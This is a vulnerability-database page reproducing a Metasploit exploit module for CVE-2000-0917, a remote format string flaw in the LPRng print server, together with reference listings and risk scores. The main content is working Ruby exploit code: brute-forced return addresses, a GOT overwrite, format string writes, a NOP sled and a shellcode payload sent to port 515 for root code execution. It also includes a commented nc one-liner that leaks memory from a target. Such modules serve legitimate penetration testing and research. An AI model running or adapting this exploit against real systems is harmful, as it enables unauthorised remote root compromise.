Vulners
Lucene search
LPRng - use_syslog Remote Format String (Metasploit)
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2000-0917 | 3 Jul 201000:00 | – | circl |
 | CVE-2000-0917 | 22 Jan 200105:00 | – | cve |
 | CVE-2000-0917 | 22 Jan 200105:00 | – | cvelist |
 | LPRng use_syslog() Remote Format String Arbitrary Command Execution | 1 Oct 200000:00 | – | nessus |
 | LPRng use_syslog Remote Format String Vulnerability | 17 Feb 201000:56 | – | metasploit |
 | CVE-2000-0917 | 19 Dec 200005:00 | – | nvd |
 | LPRng use_syslog Remote Format String Vulnerability | 17 Feb 201000:00 | – | packetstorm |
 | LPRng can pass user-supplied input as a format string parameter to syslog() calls | 4 Dec 200000:00 | – | cert |
##
# $Id: lprng_format_string.rb 9666 2010-07-03 01:09:32Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute
include Msf::Exploit::FormatString
def initialize(info = {})
super(update_info(info,
'Name' => 'LPRng use_syslog Remote Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in the LPRng print server.
This vulnerability was discovered by Chris Evans. There was a publicly
circulating worm targeting this vulnerability, which prompted RedHat to pull
their 7.0 release. They consequently re-released it as "7.0-respin".
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9666 $',
'References' =>
[
[ 'CVE', '2000-0917' ],
[ 'OSVDB', '421' ],
[ 'BID', '1712' ],
[ 'US-CERT-VU', '382365' ],
[ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
[ 'URL', 'http://www.exploit-db.com/exploits/226' ],
[ 'URL', 'http://www.exploit-db.com/exploits/227' ],
[ 'URL', 'http://www.exploit-db.com/exploits/230' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Privileged' => true, # root
'DefaultOptions' =>
{
'PrependSetresuid' => true
},
'Payload' =>
{
'Space' => 130, # buffer size on caldera is 180! (need ~50 for fmt)
'BadChars' => "\x00\x0a\x20\x25",
},
'Targets' =>
[
# tested OK - jjd
[ 'Caldera OpenLinux 2.3 Bruteforce',
{
'Platform' => 'linux',
'NumPops' => 243,
'FlowHook' => 0x80992d4, # GOT of exit
# (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xcffffff4 },
'Stop' => { 'Ret' => 0x7fffe004 },
'Step' => 16
}
}
],
=begin
# untested (from public exploits)
[ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
{
'NumPops' => 299,
'Ret' => 0xbffff640,
'FlowHook' => 0xbfffee30
}
],
[ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
{
'NumPops' => 304,
'Ret' => 0xbffff920,
'FlowHook' => 0xbffff0f0
}
],
[ 'RedHat 7.0 - Guinesss',
{
'NumPops' => 300,
'Ret' => 0x41424344,
'FlowHook' => 0xbffff3ec
}
],
[ 'RedHat 7.0 - Guinesss-dev',
{
'NumPops' => 300,
'Ret' => 0x41424344,
'FlowHook' => 0xbffff12c
}
],
=end
# ...
[ 'Debug',
{
'NumPops' => 1, # sure to miss.
'Ret' => 0x41424344,
'FlowHook' => 0x45464748
}
]
],
# 'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 25 2000'))
register_options( [ Opt::RPORT(515) ], self.class )
end
def exploit
# we want to use DPA for this one :)
fmtstr_set_caps(false, true)
# check syslog to see which number hits 41414141
=begin
400.times { |x|
connect
buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
sock.put(buf)
#handler
disconnect
}
=end
print_status("Trying target #{target.name} ..")
super
end
def brute_exploit(addrs)
#print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])
printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
num_start = printed.length + 2 + 4
# write 'ret' addr to flowhook (execute shellcode)
# NOTE: the resulting two writes must be done at the same time
# characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
fmtbuf = "_" * 4
fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
#print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
# append payload and newline
#fmtbuf << payload.encoded
fmtbuf << "\x90" * 32
fmtbuf << Rex::Text.charset_exclude(payload_badchars)
fmtbuf << "\n"
print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])
connect
#print_status("Sleeping, attach now!!")
#select(nil,nil,nil,5)
sock.put(fmtbuf)
handler
disconnect
end
end
=begin
HRM!
The following causes info leakage!
bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
0x01 -> 0x09...
It's unclear if there is a way to auto-detect the lpd version via LPD commands.
=endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.86092